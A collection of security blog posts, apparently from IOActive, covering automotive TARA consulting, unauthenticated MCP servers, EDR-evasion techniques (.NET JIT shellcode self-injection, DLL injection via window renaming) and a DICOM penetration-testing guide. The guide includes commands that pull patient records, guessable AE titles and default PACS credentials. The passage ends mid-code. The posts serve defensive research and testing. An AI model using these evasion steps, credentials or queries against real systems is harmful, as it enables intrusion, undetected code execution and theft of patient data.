The findings included not only proposed mitigation strategies but also an evaluation of their expected effectiveness in addressing each identified security gap. This comprehensive report offered the client a robust set of risks specific to their gateway ECU and a clear roadmap for mitigating them efficiently. Additionally, the TARA conducted by IOActive was a crucial step towards achieving ISO 21434 compliance, reinforcing the vehicle’s overall security posture with unmatched precision and speed.

INSIGHTS | June 24, 2025

Smarter Security, Leaner Budgets: IOActive & SERJON’s Approach to Cyber Optimization

Guest blog by Urban Jonson, SERJON
with John Sheehy and Kevin Harnett

During my recent presentation at ESCAR USA, I shared findings from my latest research on the automotive industry’s adoption of Threat Analysis and Risk Assessment (TARA) processes to develop cybersecurity artifacts that align with regulatory requirements. The automotive TARA is a systematic process used to identify potential cybersecurity threats to vehicle systems, evaluate their likelihood and impact, and determine appropriate mitigations to reduce risk to acceptable levels.

One key insight derived across numerous TARA exercises is that many organizations struggle with consistency and accuracy in their internal cybersecurity documentation. To address this, I recommend thoroughly analyzing the workflows involved in creating, reviewing, and approving such documentation. By applying business process reengineering principles and best practices, organizations can streamline and strengthen these workflows.

These findings also highlight a broader pattern that we have observed across the gamut of industries, from automotive to energy to software development, and all points in between.

In our experience working with companies of all sizes and types, one challenge keeps coming up: cybersecurity operations are becoming more expensive, but not necessarily more effective. Too often, we see teams overwhelmed by alerts, buried in redundant tools, and unsure whether their efforts are aligned with real threats. If this sounds familiar, there’s a better way to approach it—one that blends deep knowledge of threat behavior, innovative process design, and focused spending. And yes, sometimes it means bringing in an outside perspective like ours to get things moving in the right direction.

Starting with Real Threat Intelligence: TTPs

When we start working with a company, one of the first things we look at is how well its cybersecurity efforts align with actual risks. We use industry-specific TTPs—Tactics, Techniques, and Procedures used by real attackers in that sector—to uncover what’s really at stake. For example, in finance, phishing and credential theft are huge; ransomware targeting OT environments is more common in manufacturing.

This isn’t just threat modeling, it’s about making sure the company’s cybersecurity operations are focused on what matters. We’ve seen companies spend big on fancy cybersecurity tools that protect against unlikely scenarios, while overlooking common, costly vulnerabilities. TTPs help us steer the conversation toward high-impact areas that deserve real attention.

Reengineering Cyber Processes That Drag Companies Down

With those threat patterns in mind, we conduct a process analysis to map the way cybersecurity workflows actually operate inside the business. Are patching cycles too slow? Are incidents managed the same way across departments? Are cybersecurity tools overlapping or underutilized?

This is where business process reengineering comes in. We work with teams to strip away complexity, redesign inefficient workflows, and introduce automation or clear accountability where needed. The goal is simple: make the company’s cybersecurity operations faster, smarter, and cheaper without compromising protection.

And we get it—internal teams are often too close to the process to spot the friction. That’s why companies bring us in. We bring an external lens, ask the hard questions, and get everyone aligned on a working strategy.

The Eisenhower Matrix: A Surprisingly Useful Budget Tool

Once we’ve got processes in better shape, it’s time to review technology spending. One of the tools we like to use is the Eisenhower Matrix, which enables us to categorize every cybersecurity investment:

  • Urgent and Important: Must-haves, like tools protecting your most targeted assets
  • Important but Not Urgent: Strategic efforts, like employee training or improving logging infrastructure
  • Urgent but Not Important: Fire-drill requests that burn budget but add little value
  • Neither Urgent nor Important: Legacy tools collecting dust (and invoices)
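The quadrant assignment reduces to a two-flag lookup; as a minimal sketch (the investments and their flags below are hypothetical examples, not client data):

```python
# Minimal Eisenhower Matrix sketch for a cybersecurity spend review.
# Each investment is tagged (urgent, important); the quadrant drives
# the keep/defer/cut conversation. All entries are hypothetical.
def quadrant(urgent: bool, important: bool) -> str:
    if urgent and important:
        return "Urgent and Important"
    if important:
        return "Important but Not Urgent"
    if urgent:
        return "Urgent but Not Important"
    return "Neither Urgent nor Important"

investments = {
    "EDR on crown-jewel servers": (True, True),
    "Phishing-awareness training": (False, True),
    "Ad-hoc one-off audit request": (True, False),
    "Legacy IDS nobody reviews": (False, False),
}
for item, (u, i) in investments.items():
    print(f"{quadrant(u, i):28}  {item}")
```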

This simple framework helps leadership make clearer, faster decisions, and we help drive those conversations with data and context.

Why Bringing in a Consultant Helps

You might wonder, “Why bring in an outside firm to do this?” The answer is that a security consultancy with seasoned experts offers speed, experience, and perspective. We’ve worked with multiple industries, seen common patterns and pitfalls, and can move faster than most internal teams alone. We’re not here to replace your cybersecurity team; our job is to make them more effective.

If you’re serious about reducing costs, boosting productivity, and ensuring your cybersecurity efforts match your business needs, let’s talk. A little outside perspective might be just what your company needs to move forward with clarity and confidence.

Urban Jonson is a co-founder of SERJON (www.serjon.com) and a frequent collaborator with IOActive. Urban is a cybersecurity industry leader and serves in multiple advisory roles, including SAE International, TMC, ESCAR USA, CyberTruck Challenge, and as a cybersecurity expert for FBI InfraGard and the FBI Automotive Sector Working Group.

INSIGHTS | June 3, 2025

Better Safe Than Sorry: Model Context Protocol

In this blog post, we’ll delve into the world of the Model Context Protocol (MCP), an open standard designed to facilitate seamless integration between AI models and various data sources, tools, and systems. We’ll explore how its simplicity and widespread adoption have led to a proliferation of servers without basic security features, making them vulnerable to attacks.

Our goal is to raise awareness about the critical need for mandatory authentication in the MCP protocol, and we believe that this should serve as a wake-up call for other standards to follow suit.

The Model Context Protocol: A Primer

The MCP follows a client-host-server architecture, built on JSON-RPC using two transport mechanisms:

  1. Sub-process, using Standard Input and Output,
  2. Independent process, using streamable HTTP or Server-Sent Events (SSE).
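Regardless of transport, every MCP message is a JSON-RPC 2.0 payload. A minimal sketch of a client request (the tools/list method is defined in the MCP specification; the id value is arbitrary):

```python
import json

# Minimal JSON-RPC 2.0 request as sent by an MCP client;
# "tools/list" asks the server to enumerate the tools it publishes.
request = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/list",
    "params": {},
}
wire = json.dumps(request)
print(wire)
```

Note that nothing in this envelope carries credentials: unless the optional authorization layer is deployed, any client that can reach the transport can issue such requests.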

The protocol standard’s simplicity coupled with its de facto compatibility with existing open- and closed-weight Large Language Models (LLMs) made it an instant hit, with widespread adoption from the open-source community and almost all leading LLM trainers.

As of version 2024-11-05, the MCP standard had already been used in more than 4,800 MCP server implementations, according to the MCP.io website. Unfortunately, this version didn’t include an authorization mechanism in its specification, even though the draft version had included one as an optional feature.

(MCP Draft – Wayback Machine)

The next version, 2025-03-26, re-introduced the authorization specification, again as an optional feature.

(Authorization – MCP Specification)

Double-Edged Primitives

By design, the MCP standard requires servers to publish three fundamental building blocks:

  • Prompts
  • Resources
  • Tools

From a client perspective, these three primitives represent:

  • System Instructions
  • Data Access
  • Function Execution

However, from a malicious perspective, the same three primitives represent:

  • Information Leakage
  • Data Exfiltration
  • Remote Command Execution

As an example, Invariant Labs recently published a new MCP attack vector called Tool Poisoning Attacks, which leverages all three primitives at once to achieve critical impact on the host system.

In this attack, the MCP server itself acts maliciously, and because MCP servers are unauthenticated by design, we can expect a “wild west” of emerging attack vectors across AI-integrated systems and services.

A Test Case

To test the impact of such specifications firsthand, we created the following Docker Compose environment. (Note that some information is intentionally redacted to avoid fingerprinting the MCP implementor.)

(docker-compose.yml redacted; Compose file format version 3.8)

We simply ran docker-compose up, then fired up MCP Inspector:

This immediately shows us that we can connect to and use the MCP Server without authentication at all:

Additionally, this specific MCP Server provides a tool that executes SQL queries against the Postgres database as functionally expected.

This means we are a single step away from exposing our entire database externally: all it takes is not changing the listening hostname.

The important question here is: Are we ahead of the curve in terms of MCP security or not?

A Quick Exercise: Searching for MCP Servers

To answer the question above, we performed a quick exercise.

  1. We used Grep.app to search GitHub public repositories for MCP servers’ common HTTP headers.
  2. We used these headers as search queries on Shodan.
  3. Bingo!

We discovered two hosts running a public MCP server over plain HTTP. One of them was already flagged as “compromised” by Shodan, and the other was serving n8n, Open WebUI, and even Ollama web applications before it was apparently taken down.

It is worth noting that Ollama servers – just like MCP servers – are unauthenticated by default and have already had their fair share of remote code execution vulnerabilities (CVE-2024-37032).

The Takeaway: Mandatory Authentication for MCP

In conclusion, we believe that authentication is a mandatory requirement for any standard that involves remote execution of code or sensitive data access. The MCP protocol should require authentication to prevent implementors from claiming full specification compliance while omitting authentication altogether. This will help prevent insecure deployments and ensure the integrity of AI-integrated systems and services.

As the MCP protocol continues to gain traction, we hope this blog post serves as a wake-up call for the community to prioritize security and adopt mandatory authentication.

INSIGHTS | May 20, 2025

IOActive Autonomous and Transportation Experience and Capabilities

AUTONOMOUS AND REMOTE CONTROLLED/ACCESS TECHNOLOGY

As a pioneer in the field of automotive security, in 2015 IOActive was the first company to successfully launch a remote attack on a vehicle through its telematics unit (Security Experts Hack into Moving Car and Seize Control, Remote Exploitation of an Unaltered Passenger Vehicle).

For the past 5 years, IOActive has been focused on understanding Autonomous and Remote-Controlled/Access technologies and their inherent vulnerabilities and possible impacts to Functional Safety. IOActive consultants assume the posture of real-world attackers, attempting to bypass existing security controls and gain access to connected systems or services, or to the vehicle itself.

Transportation technology is evolving significantly, with enhanced autonomous functions revolutionizing automobiles, commercial trucks, and agricultural equipment. AI and Machine Learning (AI/ML) are fundamentally transforming autonomous vehicles by enabling them to understand road conditions, identify objects, predict traffic flow, make real-time decisions, and anticipate potential hazards, paving the way for partial and fully autonomous driving. IOActive delivers a suite of AI and ML security services built on proven methodologies, including Threat Modeling/Architecture Review, AI/ML Code Review/Vulnerability Assessment, Application/Device Penetration Testing, and AI Infrastructure Security (for more information, see https://www.ioactive.com/service/ai-security-services/). As vehicles have become connected, this connectivity provides significant benefits but also presents significant cybersecurity risks and vulnerabilities.

Two other emerging vehicle technologies now prevalent in today’s connected world are telematics (in automobiles, commercial trucks, agriculture/mining vehicles, and sea cranes) and Electric Vehicle Supply Equipment (EVSE). Both rely on remote cloud infrastructures, which increases the risk of attacks exploiting weaknesses such as weak or unencrypted communications, over-the-air (OTA) firmware attacks, insecure APIs, and vulnerable cloud services.

For over a decade, IOActive has been a pioneer in Transportation cybersecurity research, with a proven track record and experience in conducting penetration and security assessments on autonomous vehicles and remote-controlled assets, such as:

  • Automobiles – ADAS (Level 2 and 3), Robotaxis, Telematics
  • Commercial Trucks – Autonomous Trucks
  • Electric Vehicles – EVSEs
  • Agriculture – Autonomous Agriculture Vehicles and Autonomous On-Road/Off-Highway Vehicles (OHV)
  • Autonomous Shuttles – Personal Rapid Transit (PRT) vehicles
  • Rail/Transit – Positive Train Control (PTC)
  • Aircraft – Drones and UAVs
  • Mining – Autonomous Haulage Systems (AHS)
  • Locomotives – Remote-Controlled Locomotives
  • Maritime – Remote Operated Vessels (ROV) and Remote Operations Centers (ROCs)

A core focus of our transportation cybersecurity research program has been to help industry stakeholders with empirical vulnerability data to make risk-informed decisions about threats to cyber-physical systems. Table 1 summarizes our experience and provides examples of our recent Autonomous and Remote-Controlled/Remote Access projects conducted by IOActive over the past 5 years:

IOACTIVE TRANSPORTATION CYBERSECURITY RESEARCH

IOActive is the leading transportation cybersecurity firm, investing heavily in primary research and working with OEMs, suppliers, and academia to understand the risks, threats, and business impacts facing the transportation industry. IOActive leverages this body of research to provide clients with deeper assessments and superior guidance to leverage innovative new technologies while developing safer and more secure data, vehicles, and infrastructure. Table 2 depicts several sample research papers and articles published by IOActive regarding the Transportation Sectors and the links are below:

TRANSPORTATION CYBERSECURITY COMPLIANCE REGULATIONS/STANDARDS

Transportation cybersecurity compliance refers to the measures taken by transportation providers to ensure their systems and data are protected from cyber threats, while also adhering to regulatory and industry standards. This includes implementing security controls, reporting incidents, and conducting vulnerability assessments. Transportation organizations must comply with cybersecurity rules and regulations set by agencies like the TSA, DHS, UNECE, ISO/SAE, EU Commission, FAA, EASA, Coast Guard, International Association of Classification Societies (IACS), and IEC.

Table 3 describes for each transportation sector the applicable Cybersecurity Standards, Risk Assessment Methodologies, Information Sharing and Analysis Center (ISACs), and Communications Protocols.

IOACTIVE CYBERSECURITY SERVICES

To help protect your business from today’s increasingly complex and sophisticated cybersecurity risks, IOActive offers a full range of cybersecurity services, including penetration testing, full-scale assessments, secure development lifecycle support, red team and purple team engagements, AI/ML security services, supply chain integrity, code reviews, security training, and security advisory services. Learn more about our offerings at https://www.ioactive.com/services.

To learn more about IOActive’s Connected Vehicle Cybersecurity Services, click here.

At IOActive, we have penetration testing and full-stack assessment skills that span all the transportation sectors, along with unique cybersecurity knowledge and capabilities regarding autonomous technologies. If you’re interested in learning more about how we can help, contact us and one of our transportation cybersecurity specialists will be in touch.

INSIGHTS | May 14, 2025

Breaking Patterns: Rethinking Assumptions in Code Execution and Injection

Breaking Patterns

Security solutions like Endpoint Detection and Response (EDRs) and behavioural detection engines rely heavily on identifying known patterns of suspicious activity. For example, API calls executed in a specific order, such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, are often indicators of suspicious behaviour.

In this post, we’ll explore two techniques that break traditional patterns:

  • Self-Injection – Overwriting a method in your own process memory from within a process running a .NET Framework-managed executable.
  • Indirect DLL Path Injection – Exploiting the Windows GUI system to implant payloads in another process without direct memory writes.

Self-Injection – Code Execution Without a Loader

Traditional shellcode loaders follow a well-trodden API sequence:

VirtualAlloc → Write shellcode → Change memory protection → Execute

In a .NET application, methods are not immediately compiled to native code. Instead, the JIT compiler translates Common Intermediate Language (CIL) into native machine code the first time a method is invoked. This native code is stored in memory regions allocated on the heap, which are already marked as executable (and often writable, as well). This characteristic makes the JIT-generated method bodies ideal targets for self-modifying behavior.

To determine the access permissions of the memory region holding the compiled code, we inspected the address where the function pointer of the JIT-compiled method points across various .NET runtime environments. Specifically, in .NET 8 (net8.0) and .NET 7 (net7.0), the memory was marked as read and execute (RX), reflecting modern security practices that avoid writable executable memory. However, in .NET 6 (net6.0), .NET 5 (net5.0), .NET Core 3.1 (netcoreapp3.1), and .NET Framework 4.8.1, the memory was marked as read, write, and execute (RWX), indicating a more permissive configuration. This comparison highlights a trend toward stricter memory protections in newer versions of .NET.

Runtime Version         Memory Access Permissions
.NET Framework 4.8.1    RWX
.NET Core 3.1           RWX
.NET 5                  RWX
.NET 6                  RWX
.NET 7                  RX
.NET 8                  RX
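The original inspection was performed against the .NET runtime on Windows; as an illustrative analogue on Linux, the protection flags of any address in the current process can be read from /proc/self/maps. This sketch maps an anonymous page and reports its permissions (an executable JIT heap of the kind described above would show rwx here):

```python
import ctypes
import mmap

def perms_of(address: int) -> str:
    """Return the rwx flags of the mapping containing `address`."""
    with open("/proc/self/maps") as maps:
        for line in maps:
            addrs, flags = line.split()[:2]
            lo, hi = (int(x, 16) for x in addrs.split("-"))
            if lo <= address < hi:
                return flags[:3]
    return "---"  # address not mapped

buf = mmap.mmap(-1, mmap.PAGESIZE)  # anonymous mapping, read/write
addr = ctypes.addressof(ctypes.c_char.from_buffer(buf))
print(perms_of(addr))  # rw- : writable but not executable
```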

To exploit this, a method (such as a placeholder Test method) is compiled by the JIT, and its function pointer is retrieved via reflection. The shellcode is decrypted and copied directly over the compiled method using Marshal.Copy. When the method is called, the process executes the injected shellcode instead of the original .NET instructions.

The following screenshot shows an example of what this exploitation might look like in a program.

This screenshot shows how an attacker would execute the shellcode when calling the Test() method. First, we force compilation of the Test() method. Then we retrieve the shellcode and use it to overwrite the compiled method. Finally, when Test() is called, the shellcode is executed instead of the original method body.

Note that in this example, there is no need to call VirtualAlloc or VirtualProtect, nor modify memory protection attributes. The memory containing JIT-compiled methods is already suitable for code execution, and writing into it directly bypasses many of the behavioral IOCs typically monitored by security tools.

This technique takes advantage of the .NET runtime’s own execution model, operating entirely within expected memory regions and avoiding any calls that would raise suspicion in traditional endpoint detection systems. While not impervious to all detection, it highlights how abusing trusted execution paths can erode the reliability of conventional heuristics.

Indirect DLL Path Injection

While this post will demonstrate the following technique using window renaming, the core idea is not tied to that mechanism—any method that causes a controllable string to be stored in another process’s memory can be leveraged similarly.

The Trouble with Traditional Process Injection

Process injection is a well-known tactic in the offensive security arsenal, often used by malware and red teamers alike to execute code in the context of another process. One of the most common forms is DLL injection using the following steps:

  1. Allocate memory in the remote process with VirtualAllocEx.
  2. Write the DLL path into the allocated memory with WriteProcessMemory.
  3. Call CreateRemoteThread to run LoadLibrary.

However, these steps produce well-known Indicators of Compromise (IOCs):

  • Use of VirtualAllocEx and WriteProcessMemory on a remote process
  • API call patterns: OpenProcess → VirtualAllocEx → WriteProcessMemory → CreateRemoteThread
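These signatures are straightforward to model. As a toy sketch (not any real EDR’s logic), a behavioral detector can flag a process whose ordered API-call trace contains the classic injection sequence as a subsequence:

```python
# Toy behavioural detector: flag a trace containing the classic
# remote-injection API sequence as an ordered subsequence.
INJECTION_PATTERN = [
    "OpenProcess",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "CreateRemoteThread",
]

def matches_pattern(trace: list[str]) -> bool:
    it = iter(trace)  # `call in it` consumes the iterator, so order matters
    return all(call in it for call in INJECTION_PATTERN)

benign = ["OpenProcess", "ReadProcessMemory", "CloseHandle"]
injector = ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory",
            "CreateRemoteThread", "CloseHandle"]
print(matches_pattern(benign))    # False
print(matches_pattern(injector))  # True
```

The indirect technique described below defeats exactly this kind of check: with no VirtualAllocEx or WriteProcessMemory in the trace, the pattern never matches.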

Window Renaming as a Covert Channel

To avoid these behavioral signatures, we can use an alternative that removes the need for explicit memory allocation or memory writing in the remote process.

The Core Idea

Instead of using VirtualAllocEx and WriteProcessMemory, we leverage existing window handles owned by the target process.

Step-by-Step Logic

  1. Enumerate Windows: Use EnumWindows to find window handles belonging to the target process.
  2. Rename a Window: Modify the window’s title. The new title will be our DLL path.
  3. Memory Side Effect: When the title is set, Windows internally stores this string in the process’s address space—effectively writing our DLL path without WriteProcessMemory.
  4. Scan Process Memory: Read the remote process memory to find our DLL path string using ReadProcessMemory. The title of the window should be easy to identify, but this will not be the case if a different indirect method is used.
  5. Invoke LoadLibrary: Use CreateRemoteThread to execute LoadLibraryA with the found address.

Benefits of the indirect injection technique:

  • No VirtualAllocEx – we’re not allocating memory in the remote process.
  • No WriteProcessMemory – we’re not directly writing to remote memory.
  • No unusual memory protection flags or RWX pages.
  • The only “invasive” step is CreateRemoteThread, but even that can be replaced with more stealthy execution methods (e.g., APC, thread execution hijacking, etc.).
  • The window renaming APIs (SetWindowText, SetClassLongPtr) are rarely monitored by EDRs.
  • Looks more like GUI interaction than code injection.

Conclusion

This injection method sidesteps common behavioral IOCs by co-opting the windowing system as a covert memory channel. While not bulletproof, it challenges the assumptions many EDRs rely on and demonstrates how creative thinking can yield new evasion paths.

INSIGHTS | April 30, 2025

Penetration Testing of the DICOM Protocol: Real-World Attacks

Exploring the DICOM protocol from both a technical and offensive perspective, detailing various attack vectors and their potential impact.

Introduction to the DICOM Protocol

The Digital Imaging and Communications in Medicine (DICOM) protocol is the de facto standard for the exchange, storage, retrieval, and transmission of medical imaging information. It is widely adopted across healthcare systems for integrating medical imaging devices, such as scanners, servers, workstations, and printers, from multiple manufacturers. DICOM supports interoperability through a comprehensive set of rules and services, including data formatting, message exchange, and workflow management.

DICOM was first developed by the American College of Radiology (ACR) and the National Electrical Manufacturers Association (NEMA), and is now maintained and published by the Medical Imaging & Technology Alliance (MITA) as part of the NEMA standards suite. The protocol is formally specified in the DICOM Standard[1], which defines the data model, communication services, and conformance mechanisms that vendors and implementers must follow. An overview of DICOM’s key principles is also described in RFC 3240[2], which outlines how the protocol enables device interoperability and structured data exchange in medical environments.

DICOM handles tasks such as:

  • Transmitting medical images and associated metadata between imaging modalities and archives
  • Managing imaging workflows and procedure steps
  • Ensuring compatibility between different manufacturers’ systems through standardized message formats and service classes

Typically, DICOM servers—often referred to as Picture Archiving and Communication Systems (PACS)—listen on a designated port (default: 104) and operate using a client-server model, where entities negotiate roles as Service Class Providers (SCPs) or Service Class Users (SCUs). By default, DICOM data is transmitted in plaintext, without encryption, which poses significant security concerns in real-world deployments. As noted in the DICOM Standard PS3.15 on Security and System Management Profiles[3], secure communication can be achieved using Transport Layer Security (TLS), with port 2762 typically used for encrypted connections.

However, the adoption of DICOM over TLS remains inconsistent. When improperly configured, DICOM communications may expose Protected Health Information (PHI) to interception or tampering. This makes DICOM networks a compelling target for attackers, especially in environments lacking proper segmentation or monitoring.

Each DICOM endpoint is identified by an Application Entity Title (AET), a case-sensitive identifier that specifies the source or destination of a message. While AETs contribute to access control logic by matching incoming requests against a list of known entities, they do not constitute a strong authentication method. Since they are often guessable or misconfigured, attackers can exploit them to impersonate trusted devices.
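To see why AET matching is weak, note that the access decision reduces to a string comparison against an allow-list, with no secret involved. A toy sketch (all AE titles below are hypothetical; STORESCP and ANY-SCP mirror common tool defaults):

```python
# Toy model of AET-based "access control": the server accepts an
# association if the calling AE title is on its allow-list. Because
# titles are guessable vendor defaults, this is not authentication.
KNOWN_AETS = {"STORESCP", "PACS1", "CT_SCANNER"}

def accept_association(calling_aet: str) -> bool:
    return calling_aet in KNOWN_AETS  # string match, no secret

# An attacker simply iterates common default titles until accepted.
wordlist = ["ANY-SCP", "STORESCP", "MODALITY"]
accepted = [aet for aet in wordlist if accept_association(aet)]
print(accepted)  # ['STORESCP']
```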

DICOM’s complexity and extensibility, while essential for medical use cases, can introduce security challenges if administrators are unaware of the protocol’s design and capabilities. Insecure deployments—such as open DICOM ports, absent TLS, or unrestricted AETs—can lead to unauthorized image retrieval, metadata exfiltration, or system compromise. In this post, we’ll explore how these vulnerabilities arise and how they can be exploited in penetration testing scenarios.

Threat and Impact

DICOM data includes patient details such as name, ID, date of birth, medical description, modality, images, procedure times, accession number, referring physician, and institution. The snippet below demonstrates the information found in a DCM file (DCM being the typical DICOM file extension).

└─$ dcmdump 0015.DCM --search PatientName --search PatientID --search Modality --search PatientSex --search ReferringPhysicianName --search PerformingPhysicianName
(0010,0010) PN [Rubo DEMO]                              #  10, 1 PatientName
(0010,0020) LO [10-55-87]                               #   8, 1 PatientID
(0008,0060) CS [RF]                                     #   2, 1 Modality
(0010,0040) CS [F]                                      #   2, 1 PatientSex
(0008,0090) PN [Dr.Simon]                               #   8, 1 ReferringPhysicianName
(0008,1050) PN [Dr.Sick]                                #   8, 1 PerformingPhysicianName

Exposing patient data poses serious risks:

  • Privacy Breach: Sensitive medical information leakage violates privacy rights and erodes trust.
  • Identity Theft: Fraudsters can misuse personal data for health insurance scams or financial fraud, compromising medical records and care.
  • Healthcare Fraud: Fake prescriptions and fraudulent claims burden healthcare systems.
  • Social Engineering: Leaked data facilitates scams that manipulate victims into disclosing more information or money.
  • Legal Consequences: Institutions face fines and lawsuits for failing to protect patient data.
  • False Procedures: Data misuse can cause record errors and harmful treatments.
  • Medical Extortion: Sensitive data can be exploited for financial or emotional blackmail.

Safeguarding patient data is critical to ensure privacy, trust, and safety.


Communicating with DICOM Servers Using DCMTK

Before diving into the attack vectors, it’s important to understand how to communicate with DICOM servers for both legitimate and security testing use cases. For demonstration purposes, a test instance of the DCM4CHEE DICOM server was set up. Installation instructions can be found at https://dcm4che.atlassian.net/wiki/spaces/ee2/pages/2555918/Installation?focusedCommentId=229769217.

A sample of the web interface is shown below:

One of the most common toolkits for interacting with DICOM services is DCMTK[4]. Below are a few useful utilities from DCMTK.

echoscu

echoscu sends a DICOM C-ECHO request (similar to a “ping” in networking). It verifies connectivity and basic compatibility.

# Example usage of echoscu
$ echoscu -aet MYAET -aec SERVERAET 192.168.1.10 104
  • -aet MYAET: Sets your local Application Entity Title.
  • -aec SERVERAET: The remote server’s AET.
  • 192.168.1.10 104: The DICOM server’s IP and port.

A sample successful response is shown below:

└─$ echoscu -aet IOA -aec DCM4CHEE 172.24.0.1 11112 -v
I: Requesting Association
I: Association Accepted (Max Send PDV: 16340)
I: Sending Echo Request (MsgID 1)
I: Received Echo Response (Success)
I: Releasing Association

findscu

findscu performs a C-FIND operation, querying the remote DICOM server for matching studies, series, or images based on query parameters.

# Example usage of findscu
$ findscu -v -aet CLIENT_AET -aec SERVERAET 192.168.1.10 104 -k 0008,0052="PATIENT" -k 0010,0010 -k 0010,0020 -S

  • -S: Uses the study root query model (study-level query).
  • -k: Provides the key (or attribute) to search, e.g., PATIENT.
  • -aet: Sets the calling AE Title (default: FINDSCU).
  • -aec: Sets the called AE Title of the peer (default: ANY-SCP).

As a result, all patient IDs and names are returned.

└─$ findscu -v -aet IOA -aec DCM4CHEE 172.24.0.1 11112 -k 0008,0052="PATIENT" -k 0010,0010 -k 0010,0020 -S
I: Requesting Association
I: Association Accepted (Max Send PDV: 16340)
I: Sending Find Request (MsgID 1)
I: Request Identifiers:
I:
I: # Dicom-Data-Set
I: # Used TransferSyntax: Little Endian Explicit
I: (0008,0052) CS [PATIENT]                                #   8, 1 QueryRetrieveLevel
I: (0010,0010) PN (no value available)                     #   0, 0 PatientName
I: (0010,0020) LO (no value available)                     #   0, 0 PatientID
I:
I: ---------------------------
I: Find Response: 1 (Pending)
I:
I: # Dicom-Data-Set
I: # Used TransferSyntax: Little Endian Implicit
I: (0008,0000) UL 34                                       #   4, 1 GenericGroupLength
I: (0008,0005) CS [ISO_IR 100]                             #  10, 1 SpecificCharacterSet
I: (0008,0052) CS [PATIENT ]                               #   8, 1 QueryRetrieveLevel
I: (0010,0000) UL 42                                       #   4, 1 GenericGroupLength
I: (0010,0010) PN [Jones^James ]                           #  12, 1 PatientName
I: (0010,0020) LO [Patient ID_001]                         #  14, 1 PatientID
I:
I: ---------------------------
I: Find Response: 2 (Pending)
I:
I: # Dicom-Data-Set
I: # Used TransferSyntax: Little Endian Implicit
I: (0008,0000) UL 34                                       #   4, 1 GenericGroupLength
I: (0008,0005) CS [ISO_IR 100]                             #  10, 1 SpecificCharacterSet
I: (0008,0052) CS [PATIENT ]                               #   8, 1 QueryRetrieveLevel
I: (0010,0000) UL 34                                       #   4, 1 GenericGroupLength
I: (0010,0010) PN [Rubo DEMO ]                             #  10, 1 PatientName
I: (0010,0020) LO [10-55-87]                               #   8, 1 PatientID
I:
I: Received Final Find Response (Success)
I: Releasing Association

dcmsend

dcmsend transmits local DICOM files to a remote DICOM server (C-STORE operation).

# Sending a single DICOM file to the server
$ dcmsend -v -aet MYAET -aec SERVERAET 172.24.0.1 11112 /path/to/dicom/file.dcm
# Sending multiple DICOM files to the server
$ dcmsend -v -aet MYAET -aec DCM4CHEE 172.24.0.1 11112 --scan-directories /path/to/dicom/

A successful message is shown below:

└─$ dcmsend -v -aec DCM4CHEE -to 60 172.24.0.1 11112 0015.DCM
I: checking input files ...
I: starting association #1
I: initializing network ...
I: negotiating network association ...
I: Requesting Association
I: Association Accepted (Max Send PDV: 16340)
I: sending SOP instances ...
I: Converting transfer syntax: Little Endian Explicit -> Little Endian Implicit
I: Sending C-STORE Request (MsgID 1, RF)
I: Received C-STORE Response (Success)
I: Releasing Association
I:
I: Status Summary
I: --------------
I: Number of associations   : 1
I: Number of pres. contexts : 1
I: Number of SOP instances  : 1
I: - sent to the peer       : 1
I:   * with status SUCCESS  : 1

dcmdump

dcmdump displays the contents of a DICOM file. This is helpful for understanding the fields and tags inside a DICOM object.

# Viewing the contents of a DICOM file
$ dcmdump /path/to/dicom/file.dcm

Sample output:

dcmodify

dcmodify edits the content of DICOM files by changing, adding, or removing specific tags.

# Modifying the PatientName field
$ dcmodify -m "PatientName=TEST^PATIENT" /path/to/dicom/file.dcm

  • -i or --insert "[t]ag-path=[v]alue": insert (or overwrite) path at position t with value v
  • -m or --modify "[t]ag-path=[v]alue": modify tag at position t to value v
  • -e or --erase "[t]ag-path": erase tag/item at position t

Attack Scenarios

In the following sections, we’ll demonstrate various attacks and testing strategies against DICOM servers. They exploit issues we commonly encounter during our penetration tests and underscore the importance of proper security configurations.

1. Identifying Insecure Configurations

Often, administrators leave default configurations in place or set up DICOM services without robust access control. Attackers can leverage these misconfigurations to perform unauthorized operations, such as querying patient records or storing malicious DICOM objects.

Testing Approach:

1. Use findscu to query the DICOM server with various known or guessed AETs. The script provided here can be used to automatically go through a list of known AETs. The list below shows some commonly used AETs. These AET titles can vary depending on the vendor, installation, or configuration of the DICOM system. They are usually customizable during setup.

- PACS
  - Picture Archiving and Communication System
- ORTHANC
  - Open-source DICOM server
- DCM4CHEE
  - DICOM software suite for clinical workflows
- MEDPACS
  - Used in various PACS implementations
- IMAGESERVER
  - General purpose server title
- RADWORKS
  - Associated with radiology workflows
- CTSERVER
  - CT scanner DICOM server
- MRI_SERVER
  - MRI-specific DICOM server
- STORE_SCP
  - Storage Service Class Provider
- DICOMNODE
  - General use in testing or small-scale servers
  • Inspect the results for any sensitive data returned.
  • Attempt to store DICOM objects using the identified AET.

2. Look for exposed web interfaces on the network. In our example, the DCM4CHEE web interface is hosted over plaintext HTTP on localhost port 8080, but the HTTPS service is available to the local network.

Pro Tip: Check for default credentials. A sample list is shown below.

DICOM Server / PACS        | Default Username | Default Password | Reference
Orthanc                    | orthanc          | orthanc          | Quickstart guide for Windows
Dcm4Chee                   | admin            | admin            | DCM4CHEE 2.17.1 Installation Instructions
PACSOne Server             | root             | <empty>          | PacsOne Server Installation Guide
OnePacs Gateway            | admin            | onepacsadmin     | OnePacs Gateway User Interface
SonicDICOM PACS            | admin            | password         | SonicDICOM PACS Login Guide
Medweb Secure DICOM Proxy  | Admin            | Admin            | Medweb Secure DICOM Proxy Webserver
CharruaPACS                | admin            | admin            | CharruaPACS User Manual

2. Checking for Unencrypted Services

DICOM traffic is often sent unencrypted over TCP port 104, exposing sensitive patient data in transit. Attackers can sniff or intercept this traffic to gather PHI.

Testing Approach:

  • Use a packet sniffer (e.g. Wireshark) on the network where the DICOM server is deployed.
  • Look for unencrypted data such as patient names, study descriptions, etc.

  • Validate if the server supports TLS and if it’s configured properly.

Pro Tip: DICOM over TLS is possible but requires additional configuration. Check if any secure port (often 2762 or a custom port) is enabled.
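
To see how easily PHI falls out of such a capture, the sketch below (our own illustration; the function name and the Implicit VR assumption are ours, not from any toolkit) scans a reassembled byte stream, such as a TCP stream exported from Wireshark, for PatientName (0010,0010) elements encoded as Implicit VR Little Endian, the DICOM default transfer syntax:

```python
import struct

def extract_patient_names(stream: bytes) -> list:
    """Scan raw bytes (e.g. a reassembled TCP stream) for PatientName
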